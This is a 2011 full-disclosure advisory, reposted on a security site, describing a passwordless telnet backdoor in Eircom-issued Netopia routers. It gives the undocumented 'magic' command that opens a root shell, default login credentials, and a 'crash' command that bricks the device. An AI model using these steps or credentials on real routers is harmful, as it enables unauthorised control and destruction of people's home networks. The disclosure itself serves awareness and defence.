首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Eircom Netopia Router Backdoor
来源:vfocus.net 作者:vfocus 发布时间:2011-03-28  
++++++++++++++++++++

FULL DISCLOSURE OF EIRCOM NETOPIA ROUTER BACKDOOR VULNERABILITY!
Yes, failcom suck, and they did it again. DERP!

They gave us a nice TELNET shell into their routers, and now we can
mess about 'cos it spawns a root shell by magic! (and magic is the
actual command!)

They also left a lovely web interface with supposed remote access
capability, but i have to test that fully.

Thanks to this, evil people could be hiding "in your switches
rerouting your riches!'

Disclosed by: Netcat, Hex, Chess.

++++++++++++++++++++

Netopia SOC OS version 7.8.0 has a simple TELNET backdoor.

If a malicious attacker is on the local area network of a Netopia
router, and they TELNET to 192.168.1.254 they are greeted with the
following prompt... There is no password needed!

++++++++++++++++++++

Terminal shell v1.0
Copyright ©2008 Motorola, Inc.  All rights reserved.
Netopia Model 2247-02 High-Power Wireless DSL Ethernet Managed
Switch
Running Netopia SOC OS version 7.8.0 (build r2)
Multimode ADSL Capable
(Admin completed login: Full Read/Write access)

Netopia-2000/146306722576>


++++++++++++++++++++

If it does ask for a passphrase, we found admin/admin and
admin/password worked every time in the wild.

At the 'Admin shell' a help command gives you the following menu...


++++++++++++++++++++

Netopia-2000/146306722576> help
arp                           to send ARP request
atmping                       to send ATM OAM loopback
clear                         to erase all stored configuration
information
clear_certificate             to clear stored SSL certificate
clear_log                     to clear stored log data
configure                     to configure unit's options
diagnose                      to run self-test
download                      to download config file
exit                          to quit this shell
help                          to get more: "help all" or "help help"
hotspot                       to set or show hotspot authentication
info
install                       to download and program an image into
flash
license                       to enter an upgrade key to add a
feature
log                           to add a message to the diagnostic log
loglevel                      to report or change diagnostic log
level
netstat                       to show IP information
nslookup                      to send DNS query for host
ping                          to send ICMP Echo request
quit                          to quit this shell
reset                         to reset subsystems
restart                       to restart unit
show                          to show system information
start                         to start subsystem
status                        to show basic status of unit
telnet                        to telnet to a remote host
traceroute                    to send traceroute probes
upload                        to upload config file
view                          to view configuration summary
wan_type                      to Set WAN interface type
who                           to show who is using the shell
?                             to get help: "help all" or "help help"
wps                           to issue Wireless Protected Setup
commands

Netopia-2000/146306722576>

++++++++++++++++++++

However, typing the command 'magic' (not listed) brings up a new
shell...

++++++++++++++++++++

Netopia-2000/146306722576> magic
 (poof!)

Netopia-2000/146306722576# help
arp                           to send ARP request
atmping                       to send ATM OAM loopback
brcm                          to read/write broadcom switch
clear                         to erase all stored configuration
information
clear_certificate             to clear stored SSL certificate
clear_log                     to clear stored log data
configure                     to configure unit's options
diagnose                      to run self-test
download                      to download config file
exit                          to quit this shell
help                          to get more: "help all" or "help help"
hotspot                       to set or show hotspot authentication
info
install                       to download and program an image into
flash
loopback                      to set the interface in loopback mode
license                       to enter an upgrade key to add a
feature
log                           to add a message to the diagnostic log
loglevel                      to report or change diagnostic log
level
netstat                       to show IP information
nslookup                      to send DNS query for host
ping                          to send ICMP Echo request
quit                          to quit this shell
reset                         to reset subsystems
restart                       to restart unit
rma_count                     to perform RMA functions
show                          to show system information
sslclient                     to send HTTPS request to the Server.
Default Port is 433
start                         to start subsystem
status                        to show basic status of unit
telnet                        to telnet to a remote host
traceroute                    to send traceroute probes
upload                        to upload config file
view                          to view configuration summary
wan_type                      to Set WAN interface type
ata                           to issue commands related to remote
ATA configuration
who                           to show who is using the shell
access_code                   to show if access code is valid
bootflags                     to show or set the bootflags
checksum                      to calculate and display the cksums
console                       to make this session the console
mem                           to display or edit system memory
trace                         to toggle routing tracing
crash                         to cause system death
adsldebug                     to debug commands
dsm                           to DSM commands
set_language                  to set web display language
peer-address                  to print IP address of this shell user
?                             to get help: "help all" or "help help"
wps                           to issue Wireless Protected Setup
commands

Netopia-2000/146306722576#

+++++++++++++++++++++++

The 'Crash' command literally bricks the router. This shell is the
root shell.
It gets even worse though... It hasa lovely web
interface if you open that web address in a browser!

+++++++++++++++++++++++

A malicious attacker on the LAN can do all kinds of things...

+++++++++++++++++++++++

ALL ROUTERS ISSUED BY EIRCOM THAT WE HAVE SEEN THUS FAR ARE
VULNERABLE.
THIS IS JUST AS BAD AS THEIR 'PREDICTABLE WEP KEY GENERATION
ALGORITHM.

Not to mention, Eircoms default login is always:
eircom@eircom.net
broadband1

+++++++++++++++++++++++

Thanks for reading!

soon to come... can we overflow bit torrent buffers?

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·eXPert PDF Editor 7.0.880.0 Cr
·RealPlayer 11.0 Buffer Overflo
·wodWebServer.NET 1.3.3 Directo
·Windows Media Player 11.0 Buff
·VLC AMV Dangling Pointer Vulne
·DivX Player 7.0 Buffer Overflo
·HP OpenView Network Node Manag
·FLVPlayer4Free 2.9 Stack Overf
·ClanSphere 2010.3 / CKEditor S
·FengOffice 1.7.4 Shell Upload
·Avaya IP Office Manager 8.1 TF
·HP OpenView Network Node Manag
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved